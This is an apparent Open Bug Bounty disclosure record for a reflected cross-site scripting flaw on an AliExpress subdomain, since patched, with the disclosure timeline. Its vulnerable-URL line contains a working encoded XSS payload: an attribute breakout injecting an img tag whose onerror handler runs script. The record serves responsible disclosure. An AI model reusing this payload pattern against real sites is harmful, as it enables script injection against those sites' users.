activities.aliexpress.com XSS vulnerability

2015-07-12T00:59:00
ID OBB:71655
Type openbugbounty
Reporter sergeym
Modified 2015-07-12T01:01:00

Description

Vulnerable URL:
http://activities.aliexpress.com/kids_baby/trending_styles_list.php?nodeId=1172182&name;=123%27%22%3E%3Cimg%20src=1%20onerror=alert(%27XSSPOSED%27)%3E&widgetId;=815123%27G%22FDL
Details:

Description| Value
---|---
Patched:| Yes, at 21.10.2015
Latest check for patch:| 21.10.2015 04:36 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check activities.aliexpress.com SSL connection:| (Grade: B+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 12 July, 2015 00:59 GMT
Vulnerability existence verified and confirmed| 12 July, 2015 01:01 GMT